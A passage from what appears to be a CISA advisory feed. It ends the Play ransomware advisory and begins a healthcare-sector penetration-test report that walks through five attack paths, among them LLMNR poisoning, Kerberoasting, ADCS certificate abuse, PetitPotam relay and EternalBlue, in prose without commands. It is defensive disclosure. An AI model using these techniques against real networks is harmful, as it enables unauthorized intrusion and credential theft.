6192. <li><strong>Disable unused</strong> <strong>ports </strong>[<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.V</a>].</li>
6193. <li><strong>Consider adding an email banner to emails</strong> [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.M</a>] received from outside your organization.</li>
6194. <li><strong>Disable hyperlinks</strong> in received emails.</li>
6195. <li><strong>Implement time-based access for accounts set at the admin level and higher.</strong> For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the <a href="https://www.cisa.gov/zero-trust-maturity-model" title="Zero Trust Maturity Model">Zero Trust model</a>). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</li>
6196. <li><strong>Disable command-line and scripting activities and permissions.</strong> Privileged escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.E</a>].</li>
6197. <li><strong>Maintain offline backups of data</strong> and regularly maintain backup and restoration [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.R</a>]. By instituting this practice, an organization ensures they will not be severely interrupted, and/or only have irretrievable data.</li>
6198. <li><strong>Ensure backup data is encrypted, immutable </strong>(i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.K</a>].</li>
6199. </ul>
6200. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
6201. <p>In addition to applying mitigations, the FBI, CISA, and ASD’s ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and ASD’s ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.</p>
6202. <p>To get started:</p>
6203. <ol>
6204. <li>Select an ATT&CK technique described in this advisory (see Tables 3-11).</li>
6205. <li>Align your security technologies against this technique.</li>
6206. <li>Test your technologies against this technique.</li>
6207. <li>Analyze your detection and prevention technologies performance.</li>
6208. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
6209. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
6210. </ol>
6211. <p>The FBI, CISA, and ASD’s ACSC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
6212. <h3><strong>RESOURCES</strong></h3>
6213. <ul>
6214. <li><a href="https://www.stopransomware.gov/" title="#StopRansomware">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
6215. <li>Resource to mitigate a ransomware attack: <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="#StopRansomware Guide">#StopRansomware Guide</a>.</li>
6216. <li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0" title="Ransomware Readiness Assessment CSET v10.3">Ransomware Readiness Assessment</a>.</li>
6217. </ul>
6218. <h3><strong>REPORTING</strong></h3>
6219. <p>The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
6220. <p>The FBI, CISA, and ASD’s ACSC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">local FBI Field Office</a>, the FBI’s <a href="https://www.ic3.gov/" title="Internet Crime Complaint Center (IC3)">Internet Crime Complaint Center (IC3)</a>, or CISA via CISA’s 24/7 Operations Center (<a href="mailto:report@cisa.gov?subject=Ransomware%20Incident" title="Report to CISA">report@cisa.gov</a> or 888-282-0870).</p>
6221. <p>Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD's ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to <a href="https://www.cyber.gov.au/" title="Australian Signals Directorate’s Australian Cyber Security Centre">cyber.gov.au</a>.</p>
6222. <h3><strong>DISCLAIMER</strong></h3>
6223. <p>The information in this report is being provided “as is” for informational purposes only. CISA and the FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.</p>
6224. <h3><strong>REFERENCES</strong></h3>
6225. <p>[1] <a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy" title="Play Ransomware Group Using New Custom Data-Gathering Tools">Symantec: Play Ransomware Group Using New Custom Data-Gathering Tools</a><br><br>
6226. [2] <a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play" title="Ransomware Spotlight | Play">TrendMicro: Play Ransomware Spotlight</a><br><br>
6227. [3] <a href="https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/" title="Crimeware Trends | Ransomware Developers Turn to Intermittent Encryption to Evade Detection">SentinelLabs: Ransomware Developers Turn to Intermittent Encryption to Evade Detection</a></p>
6228. </description>
6229.  <pubDate>Mon, 11 Dec 2023 17:41:43 EST</pubDate>
6230.    <dc:creator>CISA</dc:creator>
6231.    <guid isPermaLink="false">/node/20473</guid>
6232.    </item>
6233. <item>
6234.  <title>Enhancing Cyber Resilience: Insights from the CISA Healthcare and Public Health Sector Risk and Vulnerability Assessment</title>
6235.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-349a</link>
6236.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
6237. <p>In January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a Risk and Vulnerability Assessment (RVA) at the request of a <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/healthcare-and-public-health-sector" title="Healthcare and Public Health Sector">Healthcare and Public Health (HPH) sector</a> organization to identify vulnerabilities and areas for improvement. An RVA is a two-week penetration test of an entire organization, with one week spent on external testing and one week spent assessing the internal network. As part of the RVA, the CISA assessment team conducted web application, phishing, penetration, database, and wireless assessments. The assessed organization was a large organization deploying on-premises software.</p>
6238. <p>During the one-week external assessment, the assessment team did not identify any significant or exploitable conditions in externally available systems that may allow a malicious actor to easily obtain initial access to the organization’s network. Furthermore, the assessment team was unable to gain initial access to the assessed organization through phishing. However, during internal penetration testing, the team exploited misconfigurations, weak passwords, and other issues through multiple attack paths to compromise the organization’s domain.</p>
6239. <p>In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the RVA team’s activities and key findings to provide network defenders and software manufacturers recommendations for improving their organizations’ and customers’ cyber posture, which reduces the impact of follow-on activity after initial access. CISA encourages the HPH sector and other critical infrastructure organizations deploying on-premises software, as well as software manufacturers, to apply the recommendations in the Mitigations section of this CSA to harden networks against malicious activity and to reduce the likelihood of domain compromise.</p>
6240. <p>Download the PDF version of this report:</p>
6241.  
6242.  
6243.  
6244.  
6245.  
6246. <div class="c-file">
6247.    <div class="c-file__download">
6248.    <a href="https://www.cisa.gov/sites/default/files/2023-12/aa23-349a-risk-vulnerability-assessment-healthcare-public-health-sector.pdf" class="c-file__link" target="_blank">AA23-349A Enhancing Cyber Resilience: Insights from the CISA Healthcare and Public Health Sector Risk and Vulnerability Assessment</a>
6249.    <span class="c-file__size">(PDF,       744.23 KB
6250.  )</span>
6251.  </div>
6252. </div>
6253. <h3><strong>TECHNICAL DETAILS</strong></h3>
6254. <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK for Enterprise</a> framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for tables of the threat actors’ activity mapped to MITRE ATT&CK<sup>®</sup> tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
6255. <h4><strong>Introduction</strong></h4>
6256. <p>CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. <em>See generally</em> 6 U.S.C. §§ 652(c)(5), 659(c)(6). After receiving a request for an RVA from the organization and coordinating high-level details of the engagement with certain personnel at the organization, CISA conducted the RVA in January 2023.</p>
6257. <p>During RVAs, CISA tests the security posture of an organization’s network over a two-week period to determine the risk, vulnerability, and exploitability of systems and networks. During the first week (the external phase), the team tests public facing systems to identify exploitable vulnerabilities. During the second week (the internal phase), the team determines the susceptibility of the environment to an actor with internal access (e.g., malicious cyber actor or insider threat). The assessment team offers five services:</p>
6258. <ul>
6259. <li><strong>Web Application Assessment:</strong> The assessment team uses commercial and open source tools to identify vulnerabilities in public-facing and internal web applications, demonstrating how they could be exploited.</li>
6260. <li><strong>Phishing Assessment:</strong> The assessment team tests the susceptibility of staff and infrastructure to phishing attacks and determines what impact a phished user workstation could have on the internal network. The RVA team crafts compelling email pretexts and generates payloads, similar to ones used by threat actors, in order to provide a realistic threat perspective to the organization.</li>
6261. <li><strong>Penetration Testing:</strong> The assessment team tests the security of an environment by simulating scenarios an advanced cyber actor may attempt. The team’s goals are to establish a foothold, escalate privileges, and compromise the domain. The RVA team leverages both open source and commercial tools for host discovery, port and service mapping, vulnerability discovery and analysis, and vulnerability exploitation.</li>
6262. <li><strong>Database Assessment:</strong> The assessment team uses commercial database tools to review databases for misconfigurations and missing patches.</li>
6263. <li><strong>Wireless Assessment:</strong> The assessment team uses specialized wireless hardware to assess wireless access points, connected endpoints, and user awareness for vulnerabilities.</li>
6264. </ul>
6265. <p>The assessed organization was in the HPH sector. See Table 1 for services in-scope for this RVA.</p>
6266. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6267. <caption><em>Table 1: In-Scope RVA Services</em></caption>
6268. <thead>
6269. <tr>
6270. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Phase</strong></th>
6271. <th scope="col" role="columnheader"><strong>Scope</strong></th>
6272. <th scope="col" role="columnheader"><strong>Services</strong></th>
6273. </tr>
6274. </thead>
6275. <tbody>
6276. <tr>
6277. <td>
6278. <p>External Assessment</p>
6279. </td>
6280. <td>
6281. <p>Publicly available HPH-organization endpoints discovered during scanning</p>
6282. </td>
6283. <td>
6284. <p>Penetration Testing</p>
6285. <p>Phishing Assessment</p>
6286. <p>Web Application Assessment</p>
6287. </td>
6288. </tr>
6289. <tr>
6290. <td>
6291. <p>Internal Assessment</p>
6292. </td>
6293. <td>
6294. <p>Internally available HPH-organization endpoints discovered during scanning</p>
6295. </td>
6296. <td>
6297. <p>Database Assessment</p>
6298. <p>Penetration Testing</p>
6299. <p>Web Application Assessment</p>
6300. <p>Wireless Assessment</p>
6301. </td>
6302. </tr>
6303. </tbody>
6304. </table>
6305. <h4><strong>Phase I: External Assessment</strong></h4>
6306. <h5><em><strong>Penetration and Web Application Testing</strong></em></h5>
6307. <p>The CISA team did not identify any significant or exploitable conditions from penetration or web application testing that may allow a malicious actor to easily obtain initial access to the organization’s network.</p>
6308. <h5><strong>Phishing Assessment</strong></h5>
6309. <p>The CISA team conducted phishing assessments that included both user and systems testing.</p>
6310. <p>The team’s phishing assessment was unsuccessful because the organization’s defensive tools blocked the execution of the team’s payloads. The payload testing resulted in most of the team’s payloads being blocked by host-based protections through a combination of browser, policy, and antivirus software. Some of the payloads were successfully downloaded to disk without being immediately removed, but upon execution, the antivirus software detected the malicious code and blocked it from running. Some payloads appeared to successfully evade host-based protections but did not create a connection to the command and control (C2) infrastructure, indicating they may have been incompatible with the system or blocked by border protections.</p>
6311. <p>Since none of the payloads successfully connected to the assessment team’s C2 server, the team conducted a credential harvesting phishing campaign. Users were prompted to follow a malicious link within a phishing email under the pretext of verifying tax information and were then taken to a fake login form.</p>
6312. <p>While twelve unique users from the organization submitted credentials through the malicious form, the CISA team was unable to leverage the credentials because they had limited access to external-facing resources. Additionally, the organization had multi-factor authentication (MFA) implemented for cloud accounts. <strong>Note:</strong> At the time of the assessment, the CISA team’s operating procedures did not include certain machine-in-the-middle attacks that could have circumvented the form of MFA in place. However, it is important to note that tools like Evilginx[<a href="https://github.com/kgretzky/evilginx" title="kgretzky / evilginx">1</a>] can be leveraged to bypass non-phishing resistant forms of MFA. Furthermore, if a user executes a malicious file, opening a connection to a malicious actor’s command and control server, MFA will not prevent the actor from executing commands and carrying out actions under the context of that user.</p>
6313. <h4><strong>Phase II: Internal Assessment</strong></h4>
6314. <h5><em><strong>Database, Web Application, and Wireless Testing</strong></em></h5>
6315. <p>The CISA assessment team did not identify any significant or exploitable conditions from database or wireless testing that may allow a malicious actor to easily compromise the confidentiality, integrity, and availability of the tested environment.</p>
6316. <p>The team did identify default credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/001/" title="Valid Accounts: Default Accounts">T1078.001</a>] for multiple web interfaces during web application testing and used default printer credentials while penetration testing. (See the Attack Path 2 section for more information.)</p>
6317. <h5><em><strong>Penetration Testing</strong></em></h5>
6318. <p>The assessment team starts internal penetration testing with a connection to the organization’s network but without a valid domain account. The team’s goal is to compromise the domain by gaining domain admin or enterprise administrator-level permissions. Generally, the team first attempts to gain domain user access and then escalate privileges until the domain is compromised. This process is called the “attack path”—acquiring initial access to an organization and escalating privileges until the domain is compromised and/or vital assets for the organization are accessed. The attack path requires specialized expertise and is realistic to what adversaries may do in an environment.</p>
6319. <p>For this assessment, the team compromised the organization’s domain through four unique attack paths, and in a fifth attack path the team obtained access to sensitive information.</p>
6320. <p>See the sections below for a description of the team’s attack paths mapped to the MITRE ATT&CK for Enterprise framework. See the Findings section for information on issues that enabled the team to compromise the domain.</p>
6321. <h6><em><strong>Attack Path 1</strong></em></h6>
6322. <p>The assessment team initiated LLMNR/NBT-NS/mDNS/DHCP poisoning [<a href="https://attack.mitre.org/versions/v14/techniques/T1557/001/" title="Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay">T1557.001</a>] with Responder[<a href="https://github.com/lgandx/Responder" title="lgandx / Responder">2</a>], which works in two steps:</p>
6323. <ol>
6324. <li>Responder listens to multicast name resolution queries (e.g., <code>LLMNR UDP/5355</code>, <code>NBTNS UDP/137</code>) [<a href="https://attack.mitre.org/versions/v14/techniques/T1040/" title="Network Sniffing">T1040</a>] and under the right conditions spoofs a response to direct the victim host to a CISA-controlled machine on which Responder is running.</li>
6325. <li>Once a victim connects to the machine, Responder exploits the connection to perform malicious functions such as stealing credentials or opening a session on a targeted host [<a href="https://attack.mitre.org/versions/v14/techniques/T1021/" title="Remote Services">T1021</a>].</li>
6326. </ol>
6327. <p>With this tool, the CISA team captured fifty-five New Technology Local Area Network Manager version 2 (NTLMv2) hashes, including the NTLMv2 hash for a service account. <strong>Note:</strong> NTLMv2 and other variations of the hash protocol are used for clients to join a domain, authenticate between Active Directory forests, authenticate between earlier versions of Windows operating systems (OSs), and authenticate computers that are not normally a part of the domain.[<a href="https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level" title="Network security: LAN Manager authentication level">3</a>] Cracking these passwords may enable malicious actors to establish a foothold in the domain and move laterally or elevate their privileges if the hash belongs to a privileged account.</p>
6328. <p>The service account had a weak password, allowing the team to quickly crack it [<a href="https://attack.mitre.org/versions/v14/techniques/T1110/002/" title="Brute Force: Password Cracking">T1110.002</a>] and obtain access to the organization’s domain. With domain access, the CISA assessment team enumerated accounts with a Service Principal Name (SPN) set [<a href="https://attack.mitre.org/versions/v14/techniques/T1087/002/" title="Account Discovery: Domain Account">T1087.002</a>]. SPN is the unique service identifier used by Kerberos authentication[<a href="https://learn.microsoft.com/en-us/windows/win32/ad/service-principal-names" title="Service principal names">4</a>], and accounts with SPN are susceptible to Kerberoasting.</p>
6329. <p>The CISA team used Impacket’s[<a href="https://github.com/fortra/impacket" title="fortra / impacket">5</a>] GetUserSPNs tool to request Ticket-Granting Service (TGS) tickets for all accounts with SPN set and obtained their Kerberos hashes [<a href="https://attack.mitre.org/versions/v14/techniques/T1558/003/" title="Steal or Forge Kerberos Tickets: Kerberoasting">T1558.003</a>]. Three of these accounts had domain administrator privileges—offline, the team cracked ACCOUNT 1 (which had a weak password).</p>
6330. <p>Using CrackMapExec[<a href="https://github.com/Porchetta-Industries/CrackMapExec" title="byt3bl33d3r / CrackMapExec">6</a>], the assessment team used ACCOUNT 1 [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/002/" title="Valid Accounts: Domain Accounts">T1078.002</a>] to successfully connect to a domain controller (DC). The team confirmed they compromised the domain because ACCOUNT 1 had <code>READ,WRITE</code> permissions over the <code>C$</code> administrative share [<a href="https://attack.mitre.org/versions/v14/techniques/T1021/002/" title="Remote Services: SMB/Windows Admin Shares">T1021.002</a>] (see Figure 1).</p>
6331.  
6332.  
6333.  
6334. <figure class="c-figure c-figure--image u-align-center" role="group">
6335.  
6336.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2023-12/Figure%201%20-%20ACCOUNT%201%20Domain%20Admin%20Privileges.png?itok=cARq9lWe" width="670" height="141" alt="Figure 1: ACCOUNT 1 Domain Admin Privileges">
6337.  
6338.  
6339.  
6340. </div>
6341.      <figcaption class="c-figure__caption"><em>Figure 1: ACCOUNT 1 Domain Admin Privileges</em></figcaption>
6342.  </figure>
6343. <p>To further demonstrate the impact of compromising ACCOUNT 1, the assessment team used it to access a virtual machine interface. If a malicious actor compromised ACCOUNT 1, they could use it to modify, power off [<a href="https://attack.mitre.org/versions/v14/techniques/T1529/" title="System Shutdown/Reboot">T1529</a>], and/or delete critical virtual machines, including domain controllers and file servers.</p>
6344. <h6><em><strong>Attack Path 2</strong></em></h6>
6345. <p>The team first mapped the network to identify open web ports [<a href="https://attack.mitre.org/versions/v14/techniques/T1595/001/" title="Active Scanning: Scanning IP Blocks">T1595.001</a>], and then attempted to access various web interfaces [<a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a>] with default administrator credentials. The CISA team was able to log into a printer interface with a default password and found the device was configured with domain credentials to allow employees to save scanned documents to a network share [<a href="https://attack.mitre.org/versions/v14/techniques/T1080/" title="Taint Shared Content">T1080</a>].</p>
6346. <p>While logged into the printer interface as an administrator, the team 1) modified the “Save as file” configuration to use File Transfer Protocol (FTP) instead of Server Message Block (SMB) and 2) changed the Server Name and Network Path to point to a CISA-controlled machine running Responder [<a href="https://attack.mitre.org/versions/v14/techniques/T1557/" title="Adversary-in-the-Middle">T1557</a>]. Then, the team executed a “Connection Test” that sent the username and password over FTP [<a href="https://attack.mitre.org/versions/v14/techniques/T1187/" title="Forced Authentication">T1187</a>] to the CISA machine running Responder, which captured cleartext credentials for a non-privileged domain account (ACCOUNT 2).</p>
6347. <p>Using ACCOUNT 2 and Certipy[<a href="https://github.com/ly4k/Certipy" title="Certipy">7</a>], the team enumerated potential certificate template vulnerabilities found in Active Directory Certificate Services (ADCS). <strong>Note:</strong> ADCS templates are used to build certificates for different types of servers and other entities on an organization’s network. Malicious actors can exploit template misconfigurations [<a href="https://attack.mitre.org/versions/v14/techniques/T1649/" title="Steal or Forge Authentication Certificates">T1649</a>] to manipulate the certificate infrastructure into issuing fraudulent certificates and/or escalate user privileges to a domain administrator.</p>
6348. <p>The <code>WebServer</code> template was misconfigured to allow all authenticated users permission to:</p>
6349. <ul>
6350. <li>Change the properties of the template (via <code>Object Control Permissions</code> with <code>Write Property Principals</code> set to <code>Authenticated Users</code>).</li>
6351. <li>Enroll for the certificate (via <code>Enrollment Permissions</code> including the <code>Authenticated Users</code> group).</li>
6352. <li>Request a certificate for a different user (via <code>EnrolleeSuppliesSubject</code> set as <code>True</code>).</li>
6353. </ul>
6354. <p>See Figure 2 for the displayed certificate template misconfigurations.</p>
6355.  
6356.  
6357.  
6358.  
6359. <figure class="c-figure c-figure--large c-figure--image u-align-center" role="group">
6360.  
6361.  <div class="c-figure__media">  <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2023-12/Figure%202%20-%20Misconfigured%20Certificate%20Template%20Enumerated%20via%20Certipy.png?itok=9nEucGuk" width="533" height="455" alt="Figure 2: Misconfigured Certificate Template Enumerated via Certipy">
6362.  
6363.  
6364. </div>
6365.  </figure>
6366. <p>The template’s <code>Client Authentication</code> was set to <code>False</code>, preventing the CISA assessment team from requesting a certificate that could be used to authenticate to a server in the domain. To demonstrate how this misconfiguration could lead to privilege escalation, the assessment team, leveraging its status as a mere authenticated user, briefly changed the <code>WebServer</code> template properties to set <code>Client Authentication</code> to <code>True</code> so that a certificate could be obtained for server authentication, ensuring the property was set back to its original setting of <code>False</code> immediately thereafter.</p>
6367. <p>The team used Certipy with the ACCOUNT 2 credentials to request a certificate for a Domain Administrator account (ACCOUNT 3). The team then authenticated to the domain controller as ACCOUNT 3 with the generated certificate [<a href="https://attack.mitre.org/versions/v14/techniques/T1550/" title="Use Alternate Authentication Material">T1550</a>] and retrieved the NTLM hash for ACCOUNT 3 [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/" title="OS Credential Dumping">T1003</a>]. The team used the hash to authenticate to the domain controller [<a href="https://attack.mitre.org/versions/v14/techniques/T1550/002/" title="Use Alternate Authentication Material: Pass the Hash">T1550.002</a>] and validated Domain Administrator privileges, demonstrating compromise of the domain via the <code>WebServer</code> template misconfiguration.</p>
6368. <h6><strong><em>Attack Path 3</em></strong></h6>
6369. <p>The CISA team used a tool called CrackMapExec to spray easily guessable passwords [<a href="https://attack.mitre.org/versions/v14/techniques/T1110/003/" title="Brute Force: Password Spraying">T1110.003</a>] across all domain accounts and obtained two sets of valid credentials for standard domain user accounts.</p>
6370. <p>The assessment team leveraged one of the domain user accounts (ACCOUNT 4) to enumerate ADCS via Certipy and found that web enrollment was enabled (see Figure 3). If web enrollment is enabled, malicious actors can abuse certain services and/or misconfigurations in the environment to coerce a server to authenticate to an actor-controlled computer, which can relay the authentication to the ADCS web enrollment service and obtain a certificate for the server’s account (known as a relay attack).</p>
6371.  
6372.  
6373.  
6374. <figure class="c-figure c-figure--image u-align-center" role="group">
6375.  
6376.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2023-12/Figure%203%20-%20Misconfigured%20ADCS%20Enumerated%20via%20Certipy.png?itok=1Z-Pu9sU" width="661" height="323" alt="Figure 3: Misconfigured ADCS Enumerated via Certipy">
6377.  
6378.  
6379.  
6380. </div>
6381.      <figcaption class="c-figure__caption"><em>Figure 3: Misconfigured ADCS Enumerated via Certipy</em></figcaption>
6382.  </figure>
6383. <p>The team used PetitPotam [<a href="https://github.com/topotam/PetitPotam" title="topotam / PetitPotam">8</a>] with ACCOUNT 4 credentials to force the organization’s domain controller to authenticate to the CISA-operated machine and then used Certipy to relay the coerced authentication attempt to the ADCS web enrollment service to receive a valid certificate for ACCOUNT 5, the domain controller machine account. They used this certificate to acquire a TGT [<a href="https://attack.mitre.org/versions/v14/techniques/T1558/" title="Steal or Forge Kerberos Tickets">T1558</a>] for ACCOUNT 5.</p>
6384. <p>With the TGT for ACCOUNT 5, the CISA team used <code>DCSync</code> to dump the NTLM hash [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/006" title="OS Credential Dumping: DCSync">T1003.006</a>] for ACCOUNT 3 (a Domain Administrator account [see <a href="#_Attack_Path_2">Attack Path 2</a> section]), effectively leading to domain compromise.</p>
6385. <h6><strong><em>Attack Path 4</em></strong></h6>
6386. <p>The CISA team identified several systems on the organization’s network that do not enforce SMB signing. The team exploited this misconfiguration to obtain cleartext credentials for two domain administrator accounts.</p>
6387. <p>First, the team used Responder to capture the NTLMv2 hash for a domain administrator account. Next, they used Impacket’s NTLMrelayx tool[<a href="https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py" title="fortra / impacket">9</a>] to relay the authentication for the domain administrator, opening a SOCKS connection on a host that did not enforce SMB signing. The team then used DonPAPI[<a href="https://github.com/login-securite/DonPAPI" title="login-securite / DonPAPI">10</a>] to dump cleartext credentials through the SOCKS connection and obtained credentials for two additional domain administrator accounts.</p>
6388. <p>The CISA team validated the privileges of these accounts by checking for <code>READ,WRITE</code> access on a domain controller <code>C$</code> share [<a href="https://attack.mitre.org/versions/v14/techniques/T1039/" title="Data from Network Shared Drive">T1039</a>], demonstrating Domain Administrator access and therefore domain compromise.</p>
6389. <h6><strong><em>Attack Path 5</em></strong></h6>
6390. <p>The team did vulnerability scanning [<a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a>] and identified a server vulnerable to <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-0144" title="CVE-2017-0144">CVE-2017-0144</a> (an Improper Input Validation [<a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">CWE-20</a>] vulnerability known as “EternalBlue” that affects SMB version 1 [SMBv1] and enables remote code execution [see Figure 4]).</p>
6391.  
6392.  
6393.  
6394. <figure class="c-figure c-figure--image u-align-center" role="group">
6395.  
6396.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2023-12/Figure%204%20-%20Checking%20for%20EternalBlue%20Vulnerability.png?itok=WMjX5PW9" width="626" height="106" alt="Figure 4: Checking for EternalBlue Vulnerability">
6397.  
6398.  
6399.  
6400. </div>
6401.      <figcaption class="c-figure__caption"><em>Figure 4: Checking for EternalBlue Vulnerability</em></figcaption>
6402.  </figure>
6403. <p>The CISA assessment team then executed a well-known EternalBlue exploit [<a href="https://attack.mitre.org/versions/v14/techniques/T1210/" title="Exploitation of Remote Services">T1210</a>] and established a shell on the server. This shell allowed them to execute commands [<a href="https://attack.mitre.org/versions/v14/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>] under the context of the local <code>SYSTEM</code> account.</p>
6404. <p>With this local <code>SYSTEM</code> account, CISA dumped password hashes from a Security Account Manager (SAM) database [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/002/" title="OS Credential Dumping: Security Account Manager">T1003.002</a>]. The team parsed the hashes and identified one for a local administrator account. Upon parsing the contents of the SAM database dump, the CISA team identified an NTLM hash for the local administrator account, which can be used to authenticate to various services.</p>
6405. <p>The team sprayed the acquired NTLM hash across a network segment and identified multiple instances of password reuse allowing the team to access various resources including sensitive information with the hash.</p>
6406. <h4><strong>Findings</strong></h4>
6407. <h5><em><strong>Key Issues</strong></em></h5>
6408. <p>The CISA assessments team identified several findings as potentially exploitable vulnerabilities that could compromise the confidentiality, integrity, and availability of the tested environment. Each finding, listed below, includes a description with supporting details. See the Mitigations section for recommendations on how to mitigate these issues.</p>
6409. <p>The CISA team rated their findings on a severity scale from critical to informational (see Table 2).</p>
6410. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6411. <caption><em>Table 2: Severity Rating Criteria</em></caption>
6412. <thead>
6413. <tr>
6414. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Severity</strong></th>
6415. <th scope="col" role="columnheader"><strong>Description</strong></th>
6416. </tr>
6417. </thead>
6418. <tbody>
6419. <tr>
6420. <td>
6421. <p>Critical</p>
6422. </td>
6423. <td>
6424. <p>Critical vulnerabilities pose an immediate and severe risk to the environment because of the ease of exploitation and potential impact. Critical items are reported to the customer immediately.</p>
6425. </td>
6426. </tr>
6427. <tr>
6428. <td>
6429. <p>High</p>
6430. </td>
6431. <td>
6432. <p>Malicious actors may be able to exercise full control on the targeted device.</p>
6433. </td>
6434. </tr>
6435. <tr>
6436. <td>
6437. <p>Medium</p>
6438. </td>
6439. <td>
6440. <p>Malicious actors may be able to exercise some control of the targeted device.</p>
6441. </td>
6442. </tr>
6443. <tr>
6444. <td>
6445. <p>Low</p>
6446. </td>
6447. <td>
6448. <p>The vulnerabilities discovered are reported as items of interest but are not normally exploitable. Many low items reported by security tools are not included in this report because they are often informational, unverified, or of minor risk.</p>
6449. </td>
6450. </tr>
6451. <tr>
6452. <td>
6453. <p>Informational</p>
6454. </td>
6455. <td>
6456. <p>These vulnerabilities are potential weaknesses within the system that cannot be readily exploited. These findings represent areas that the customer should be cognizant of, but do not require any immediate action.</p>
6457. </td>
6458. </tr>
6459. </tbody>
6460. </table>
6461. <p>The CISA assessment team identified four High severity vulnerabilities and one Medium severity vulnerability during penetration testing that contributed to the team’s ability to compromise the domain. See Table 3 for a list and description of these findings.</p>
6462. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6463. <caption><em>Table 3: Key Issues Contributing to Domain Compromise</em></caption>
6464. <thead>
6465. <tr>
6466. <td><strong>Issue</strong></td>
